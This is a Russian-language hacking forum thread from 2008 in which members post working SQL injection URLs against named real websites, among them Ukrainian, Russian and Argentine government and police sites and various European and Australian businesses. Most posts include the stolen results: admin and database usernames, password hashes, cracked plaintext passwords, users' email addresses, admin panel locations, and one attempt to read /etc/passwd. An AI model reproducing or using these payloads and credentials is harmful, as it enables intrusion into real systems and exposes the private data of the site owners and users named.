Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.07.2008, 17:51
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 16
Провел на форуме:
57497
Репутация:
8
|
|
сайт налоговой милиции в одессе
http://www.nalog.od.ua/a.php?article_id=4680&rid=-1+union+select+1,2,3,4,column_name,6,7,8+from+info rmation_schema.columns+where+table_name=0x75736572 +limit+1,1--
|
|
|
04.07.2008, 19:14
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
gangs - менты это хорошо..
http://www.nalog.od.ua/a.php?article_id=4680&rid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8+from+nalogod_.user--
админка: /edit
natasha:0444730b0844225c - ************
Grey: Тема не для вопросов.
Последний раз редактировалось Grey; 05.07.2008 в 12:06..
Причина: Тема не для вопросов.
|
|
|
|
04.07.2008, 19:16
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.prokuratura-kamchatka.ru/?id=7+and+1=0+union+select+1,concat_ws(0x3a,user_l evel,user_id),concat_ws(0x3a,username,user_email,u ser_password,user_avatar)+from+phpbb_users+where+u ser_level%3E0+limit+1,1
5.0.45-log
http://vestipk.ru/forum/admin
vestipk:f00bb259f87de37586b7b51c2fee1dd6:dtnth
==================================================
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,convert(concat_ws(0x3a,usern ame,password),binary),5,6,7,8,9,0,1+from+users/*
4.1.11-Debian_4sarge7
admin:m3mph15
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,convert(concat_ws(0x3a,usern ame,user_password),binary),5,6,7,8,9,0,1+from+phpb b_users+limit+1,1/*
admin:e54f5e626948378243ddc7fd8fb88752:pusikurac
================================================== =
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(concat_ws(0x3a,usern ame,password),binary),5,6,7,8,9,0,1+from+adminuser s/*
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(concat_ws(0x3a,usern ame,password),binary),5,6,7,8,9,0,1+from+users/*
4.1.11-Debian_4sarge7
admin:4dm1n
================================================== =
http://www.gamershood.com/game.php?id=-1255+union+select+1,2,concat_ws(0x3a,username,pass word,salt),4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+user+l imit+21391,1/*
4.1.20-log
21к юзеров булки - md5(md5($pass).$salt)
GamersHood:e4d886385fb7b53083fadd97a66b5078:;0N
================================================== =
http://www.uainfo.com/?rubid=-70+union+select+1,2,3,4,5,6,7,8,concat(user,0x3a,p assword,0x3a,host),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 +from+mysql.user/*
root:773214e90eb99bdb:111
uainfo:1cdbd77479a6b181
5.0.37
http://www.uainfo.com/?rubid=-70+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,nam e,adPass,email,www,status),0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5+from+ads/*
67к юзверей
================================================== =
http://www.salta.gov.ar/ver_noticia.php?id=-6293+union+select+1,concat_ws(0x3a,user,password,h ost),3,4,5,6,7,8,9,0,1,2,3,4,5+from+mysql.user/*
5.0.26
ftpsigep:326bc18760bb7138:info777
ftpboletin:1723474445ad5325:
ftpsecmayores:6461d4e9239d87ba:lv426
root:*37CDEC361C71AE7488B38F326EB4E47B0E9071C8:
ftpamt:*3B4AA1C58CB4B241822483358B14ED70C830C33F:a mtweb
ftpdeportes:*2F6FD4EDD929DA2998595EA8F162F21AD2EFA FA5:
dbprensa3:*75812E11D73622956C8693C9164934DC38F4012 4:
ftpcerrillos:*C661E8BABAD3C854A461AD6A830C38C785FB E8BA:
ftpucc:*0A14D7147DA45C5B8BA525993480BC94B7F75A28:g x260
estadisticas:*426555DC02DB082487C32416E9326EDCA3F6 8E38:est123
ftpdgpt:*75E5018AC4C15AE017D4CD9B45AF4E53F42AEA05:
ipvuser:*33D85363B065BDB9BA1D6242CD4F5F9324C67094:
ftpregistro:*D626480368E2CEC93C5ABD6C9413125A3A54C 338:
ftpsalud:*A289157FE5C507B08970E7D15A183D29B57960ED :liga18
script:*8FD8A99335F1F8A3A24A3E1088EAA3C872EE65D8:s cript
juan:*7ABD7F0A2A70C30B46E318E3A647A90D21D7696C:mis 6524
jfg:*7541914222C92705D642485C0125B8F8618F0711:quel onio
ftpenresp:*864CD7CDBABFB1C493EAB982781CBB99BB48519 F:enteweb
ftpmuniyrigoyen:*D16B3D7319F09B3493F7F35E090A9EF6F 2477C26:
http://www.salta.gov.ar/ver_noticia.php?id=-6293+union+select+1,concat_ws(0x3a,apodo_usu,pass_ usu),3,4,5,6,7,8,9,0,1,2,3,4,5+from+amt.usuarios+l imit+0,1/*
ARIEL:pelikan
POLICIAS:VIAL
AMT:TAXI
================================================== =
http://www.saludsalta.gov.ar/ver-prevencion.php?id=-13+union+select+1,2,3,4,concat_ws(0x3a,user,passwo rd,host),6+from+mysql.user/*
root:*37CDEC361C71AE7488B38F326EB4E47B0E9071C8:loc alhost
http://www.saludsalta.gov.ar/ver-prevencion.php?id=-13+union+select+1,2,concat_ws(0x3a,apodo_usu,pass_ usu),4,5,6+from+amt.usuarios+limit+0,1/*
ARIEL:pelikan
POLICIAS:VIAL
AMT:TAXI
|
|
|
|
05.07.2008, 00:11
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.hofigal.eu/produse.php?id=-446+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
Database Version: 4.1.22-standard-log
Database name: hofigal_hofigal
User name: hofigal_soft@ro5.globehosting.net
Tables: admin
users- user_id, username, password
hofigal:tazmanian
в таблице админ не смог подобрать колонки
www.hofigal.eu/admin
спасибо за внимание
пример для новичков
http://www.carpediemtransport.ro/stirea.php?id=-1+union+select+1,2,3,4/*
выводит поля ....вроде все норм, но при
http://www.carpediemtransport.ro/stirea.php?id=-1+union+select+1,concat_ws(user(),database(),versi on()),3,4/*
ошибка,многие забросили бы.... но не надо забывать про AES_ENCRYPT и AES_DECRYPT и конечно же LIMIT
а вот и результат
http://www.carpediemtransport.ro/stirea.php?id=1+UNION+SELECT+1,aes_decrypt(aes_enc rypt(concat_ws(0x3a,version(),database(),user()),0 x71),0x71),3,4+LIMIT+1,1/*
Database Version: 4.1.11-nt
Database name: carpediemtravel
User name: carpediem@localhost
жаль что не подобрал таблицы...
спасибо всем
http://www.apd.ro/proiect.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(version(),0x3a,database(),0x3a,user()),0x71),0x 71),4,5,6,7,8/*
Database Version: 4.1.11-nt
Database name: carpediemtravel
User name: carpediem@localhost
таблицы не подобрал...но сильно и не старался
http://www.remediiflorale.ro/remedii_detalii.php?ID=1+union+select+1,2,3,concat _ws(user(),database,version()),5,6,7,8,9+limit+1,1 /*
Database Version: 4.1.22-standard
Database name: remediif_remediiflorale
User name: remediif_cabat@localhost
подобрал только
phpbb_users
user_email, user_password , username
claudia.cabat@remediiflorale.ro:71d2313de7268950bb abc4bcea2db583:remediiflorale
хеш не брутил...кто имеет желание....пожалуйста
всем спасибо
http://www.gfialomita.ro/det_public.php?id=-1'+UNION+SELECT+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7/*
Database Version: 4.1.21-log
Database name: gfialomita
User name: root@localhost
нашёл в базе mysql.user
password : user
7864ed0a46b1e475:root
пароль был найден на hashcracking.info за что огромное спасибо Lebed
pass : market
всем спасибо
http://www.lilstructuraldesign.ro/work.php?id=1+UNION+SELECT+1,2,3,4,concat_ws(0x3a, user(),version(),database()),6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58+LIMIT+1,1/*
Database Version: 4.1.22-standard
Database name: lil_web
User name: lil_web@localhost
нашел users: id, pass, user
amro:b4af804009cb036a4ccdc33431ef9ac9: pass1234
www.lilstructuraldesign.ro/admin
пасс к сожалению не подходит
фтп у них публик...
спасибо всем
http://www.darvari.ro/index.php?id=2+UNION+SELECT+1,CONCAT_WS(0x3a,user( ),version(),database()),3,4,5,6,7,8,9+LIMIT+1,1/*
Database Version: 4.1.20-log
Database name: shdarvariro
User name: darvariro@193.226.140.172
нашёл phpbb_users
user_email, user_password, username
cristian_george1964@yahoo.com:$H$98LNbj3Sb0XchuuOz azRcHsqkYied0.:CristianSurdu
cristian_papusoiu82@yahoo.com:fde4fc933d4371c52414 7a4699484248:Papusoiu Cristian
adeladoloc@yahoo.com:282bbbfb69da08d03ff4bcf34a94b c53:Viorel Doloc
iulia.velican@gmail.com:d901619e37d52078ec5765b3df dd8680:florin-v
adi.oprea@schweighofer.ro:4dd77ecaf88620f5da8967bb d91d9506:adi.oprea
[n_vali68@yahoo.com:$H$9ud2wu9dbIjhULsv2FFVYqLcb/7XD70:vali nedelea
и так далее, хеши не брутил... милости просим всеx желающих
http://www.gimco-rentacar.ro/veicolo.php?id=1+union+select+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7+limit+1,1/*
интересный вывод..кто захочет тот поймёт.. таблы к сожаленю не подобрал
Database Version: 4.1.21-standard-log
Database name: gimco_cms
User name: gimco_cms@localhost
http://www.intorsura.ro/clubrestdisc/estaur.php?id=1+union+select+1,2,concat_ws(0x3a,us er(),database(),version()),4,5,6,7,8,9,10,11+limit +1,1
Database Version: 4.1.22-standard-log
Database name: intors_intorsura
User name: intors_jymmy5@localhost
admin
nume,parola
Joos:jooti1103
ЗЫ. Хорошо знать много языков.... иногда колонки попадаются и такие..переведённые
http://www.intorsura.ro/admin/utilizatori/login/admin.php
without password
http://www.3la3.ro/detalii_stire.php?id=31+UNION+SELECT+1,2,3,concat_ ws(0x3a,user(),version(),database()),5,6,7,8,9,10, 11,12,13+LIMIT+1,1/*
Database Version: 5.0.45-community
Database name: sportare_sportarena
User name: sportare_kadour@localhost
administratori:
drogo:c973dec0d6f378c500a1dadc14149887
valau:c973dec0d6f378c500a1dadc14149887
constu:e7b67b0bf3aa2a72dc31458acd5f905f
operator:08fbb70044e49261bb4d40262144c791:ziani
pedro:4a5970427c6a784b930b0668b1189c8b
http://www.3la3.ro/admin
спасибо за внимание
http://www.psc.ro/comunicate_detalii.php?id=1+UNION+SELECT+1,concat_ ws(0x3a,user(),version(),database()),3,4,5,6,7/*
Database Version: 4.1.20-log
Database name: netpscro
User name: pscro@193.226.140.172
таблы подобрать не смог
http://www.generatoare.ro/listare.php?id=1'+union+select+1,2,aes_decrypt(aes _encrypt(concat(0x3a,version(),0x3a,database(),0x3 a,user()),0x71),0x71),4,5+LIMIT+1,1/*
Database Version: 4.1.12
Database name: generatoare
User name: generat_oare@localhost
смотрим в хедере...или сурс откройте
users:
columns: id,email,nume,parola
http://www.corso-automobile.ro/detalii.php?id=1+UNION+SELECT+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7,8,9,10,11,12,1 3,14+LIMIT+1,1/*
Database Version: 5.0.45-community-log
Database name: delsoftr_corsoautomobile
User name: delsoftr_vlad@localhost
в БД >13 базочек... копайтесь сами.пароли там в открытом виде.удачи
delsoftr_adan
delsoftr_adan2
delsoftr_adantrans
delsoftr_autocentrusibiu
delsoftr_auto
delsoftr_autostock
delsoftr_autostyleWWW
delsoftr_autotest
delsoftr_autotest
delsoftr_delcar
delsoftr_delcar2
delsoftr_delcarmoreni
delsoftr_delsoft
delsoftr_demogestiune ......
http://www.topline.ro/stiri.php?id=1'+union+select+1,aes_decrypt(aes_enc rypt(concat_ws(0x3a,Version(),Database(),User()),0 x71),0x71),3,4,5+limit+1,1/*
Database Version: 5.0.18
Database name: topline
User name: root@localhost
в БД 2 базы
1.mysql
2.topline
в первой инфа о БД, юзер пасс..и т.д.и.т.п.
во вторй есть админы
вернее админ, так как он там один вроде
login: admin
password: parola123
http://www.topline.ro/admin
на сегодня всё..всем спасибо за проявленное внимание..ваш покорный слуга Горев
Последний раз редактировалось Constantine; 07.07.2008 в 19:59..
|
|
|
|
05.07.2008, 04:37
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://www.redlynx.com/index.php?id=493&newsId=-125+union+select+1,2,3,concat_ws(char(58),version( ),user(),database()),5,6,7/*
5.0.22/redlynxcom@10.0.0.205/redlynxcom
http://www.redlynx.com/index.php?id=493&newsId=-125+union+select+1,2,3,concat_ws(char(58),login,pa ssword,email,admin),5,6,7+from+iman_users/*
------------------------------------------------------------------------
http://www.avpkf.com/index.php?action=pages&id=-2+union+select+1,2,concat_ws(char(58),version(),us er(),database()),4/*
5.0.45-community/avpkfco_avangard@localhost/avpkfco_1
http://www.avpkf.com/index.php?action=pages&id=-2+union+select+1,2,concat_ws(char(58),id,email,pwd ),4+from+avgdusers/*
------------------------------------------------------------------------
http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,concat_ws(char(58),version(),user (),database()),3,4,5,6,7,8,9,10,11/*
4.1.20-log/iwdp@localhost/iwdp
http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,concat_ws(char(58),username,passw ord),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*
------------------------------------------------------------------------
http://www.ingnet.co.uk/productdetail.php?id=-518+union+select+1,2,3,4,concat_ws(char(58),versio n(),user(),database()),6,7,8,9/*
4.1.20-standard/pauling4_log1@localhost/pauling4_ingnetstock
http://www.ingnet.co.uk/productdetail.php?id=-518+union+select+1,2,3,4,concat(username,char(58), password),6,7,8,9+from+users/*
------------------------------------------------------------------------
http://www.lewesbaptistchurch.org.uk/default.php?id=-13+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4+from+users/*
5.0.45/lewes@localhost/lewesbaptistchurch_eastgate
http://www.lewesbaptistchurch.org.uk/default.php?id=-13+union+select+1,concat_ws(char(58),username,pass word),3,4+from+users+limit+0,1/*
------------------------------------------------------------------------
http://www.matthew-james.co.uk/books.php?id=-32+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.51a-community/matthewj_main@localhost/matthewj_main
http://www.matthew-james.co.uk/books.php?id=-32+union+select+1,concat_ws(char(58),username,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mj_user s+limit+151--
moodesign:sinead
PЗаходим на http://www.matthew-james.co.uk/login.php и вводим Username и Password. Воля! Мы в Админке
Я старался)) Говорят, что цвета немного глаза режут, но я уже ничего менять не буду))
Последний раз редактировалось Tigger; 05.07.2008 в 05:10..
|
|
|
|
05.07.2008, 08:56
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Jeroenwijering.com - PR 8
http://www.jeroenwijering.com/?page=wizard&example=999999+UNION+SELECT+1,2,3,4,5 ,6,7,unhex(hex(version()))/*
Inderscience.com - PR 7
http://www.inderscience.com/mapper.php?id=99999+union+select+1,2,unhex(hex(ver sion()))/*
http://www.inderscience.com/mapper.php?id=99999+union+select+1,2,unhex(hex(con cat_ws(0x3a,user,password)))+from+mysql.user/*
http://www.inderscience.com/mapper.php?id=99999+union+select+1,2,unhex(hex(loa d_file(char(47,101,116,99,47,112,97,115,115,119,10 0))))/*
жаль не плучилось шелл залить.. фильтрует кавычки..(
Butv10.com - PR 6
http://www.butv10.com/series.php?id=999999+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,unhex(hex(version())),18,19 ,20,21,22,23,24,25/*
Earthfiles.com - PR 6
http://www.earthfiles.com/news.php?ID=99999999+union+select+1,2,3,4--
чтобы получить вывод нужно заплатить..)) me платить не будет.)
Shocktillyoudrop.com - PR 6
http://www.shocktillyoudrop.com/news/topnews.php?id=999999+union+select+version(),2/*
Fm.gov.lv - PR 6
http://www.fm.gov.lv/index.php?id=-1+union+select+1/*
скуль...?
Fadetoblack.com - PR 5
http://fadetoblack.com/modules.php?op=modload&name=News&file=article&sid= 25&mode=1%22
(c) VITAL
Последний раз редактировалось sabe; 05.07.2008 в 20:50..
|
|
|
|
05.07.2008, 12:02
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от sabe
http://www.cesvot.it/usr_view.php/ID=-1%20union%20select%201,2,3,4,5,6,7--
я тут вообще инъекции не увидел
Сообщение от sabe
http://www.freewebtemplates.com/template.php?id=3&start=99999'
тут кстати тоже...
Последний раз редактировалось gisTy; 05.07.2008 в 12:14..
|
|
|
|
05.07.2008, 12:09
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.roviniete.ro/detalii_vignete_europa.php?id=1+union+select+1,con cat_ws(0x3a,user(),version(),database()),3+limit+1 ,1/*
Database Version: 5.0.45
Database name: rovini_roviniete
User name: rovini_usrrovi@localhost
admins :
dan:7c4014be271c668dffa7911537fc3203
rbd:8b6a8a4e9fd167ad9dfeabd502ebace3: makaveli
админку не нашел...
на морде есть логин для клиентов
http://www.santo-raphael.ro/product.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,concat_ws(0x3a,version(),user(),database()) ,14,15,16,17,18+limit+1,1/*
Database Version: 4.1.14
Database name: shop
User name: admin@localhost
tables
admin колонки которые подобрал не интересные: email,id, phone
mysql.user колонки pasword, user
admin:2ef439381b2bdf7b: galeon
usr_market:2ef439381b2bdf7b : galeon
админку не искал..на морде логин для клиентов
Последний раз редактировалось Gorev; 05.07.2008 в 12:36..
|
|
|
|
05.07.2008, 18:07
|
|
Познающий
Регистрация: 13.04.2008
Сообщений: 42
Провел на форуме:
384537
Репутация:
35
|
|
www.02.ru - Правоохранительный портал
_http://www.02.ru/zakon/index.php?id_mz=15+union+select+1,concat_ws(0x3a,u ser(),version(),database()),3,4/*
USER: ru183180_02ru@localhost
VERSION: 4.0.27-log
DATABASE: ru183180_02rudb
Они даже себя засчищать не хотят 
|
|
|
|
05.07.2008, 18:42
|
|
Новичок
Регистрация: 19.08.2007
Сообщений: 18
Провел на форуме:
182410
Репутация:
8
|
|
http://www.slamdunk.ro/stire.php?id=-400+union+select+1,2,3,4,5,6,7,8,9/*
http://www.ccimm.ro/search/show.php?id=-131'+union+select+1,2,3,4,5,6,concat_ws(char(58),u sername,password),8,9,0,1,2,3,4,5+from+user/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
